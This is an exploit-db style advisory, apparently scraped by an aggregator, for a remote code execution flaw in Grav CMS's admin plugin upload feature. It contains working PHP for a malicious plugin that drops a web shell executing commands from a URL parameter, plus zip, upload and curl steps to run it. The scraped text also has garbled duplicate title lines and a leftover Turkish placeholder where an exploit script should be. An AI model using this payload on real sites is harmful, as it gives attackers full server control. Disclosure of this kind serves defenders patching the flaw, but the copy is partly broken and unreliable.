[webapps] Grav CMS 2.0.0-beta.2 - Remote Code Execution
# Exploit Title: Grav CMS < 2.0.0-beta.2 - Remote 2026-5-26 00:0:0 Author: www.exploit-db.com(查看原文) 阅读量:0 收藏
# Exploit Title: Grav CMS < 2.0.0-beta.2 - Remote 2026-5-26 00:0:0 Author: www.exploit-db.com(查看原文) 阅读量:0 收藏
# Exploit Title: Grav CMS < 2.0.0-beta.2 - Remote Code Execution (RCE)
# Date: 2026-05-08
# Exploit Author: Mustafa Murat Akgül
# Vendor Homepage: https://getgrav.org/
# Software Link: https://github.com/getgrav/grav
# Version: < 2.0.0-beta.2
# CVE: CVE-2026-42607 / GHSA-w48r-jppp-rcfw
# Tested on: Linux/Ubuntu (Grav Admin Plugin Enabled)
Technical Details:
The Grav CMS "Direct Install" feature in the Admin plugin allows administrators
to upload plugins as ZIP files. The system failed to adequately validate the
contents of the ZIP archive or prevent path traversal (Zip Slip) during extraction.
By crafting a malicious plugin that hooks into Grav events (e.g., onPluginsInitialized),
an attacker can execute arbitrary PHP code or drop a persistent web shell on the root directory.
Proof of Concept (PoC):
1. Create a malicious plugin structure:
- shellplugin/blueprints.yaml
- shellplugin/shellplugin.yaml
- shellplugin/shellplugin.php (Payload below)
--- shellplugin.php ---
<?php
namespace Grav\Plugin;
use Grav\Common\Plugin;
class ShellpluginPlugin extends Plugin {
public static function getSubscribedEvents(): array {
return ['onPluginsInitialized' => ['onPluginsInitialized', 0]];
}
public function onPluginsInitialized(): void {
$shell_path = GRAV_ROOT . '/shell.php';
if (!file_exists($shell_path)) {
file_put_contents($shell_path, '<?php system($_GET["cmd"]); ?>');
}
}
}
----------------------
2. Compress the directory:
$ zip -r shellplugin.zip shellplugin/
3. Log in to the Grav Admin panel and navigate to:
/admin/tools/direct-install
4. Upload the 'shellplugin.zip' file.
5. Once installed, the plugin triggers on the next request to the site,
dropping a shell at the root.
6. Access your shell:
curl "http://<target>/shell.php?cmd=id"
Exploit Script (Python):
[Buraya yukarıda paylaştığın Python scriptini ekleyebilirsin]
Impact:
Full system-level access under the context of the web server user. An attacker
with administrative privileges (or via CSRF) can compromise the entire server.
文章来源: https://www.exploit-db.com/exploits/52578
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh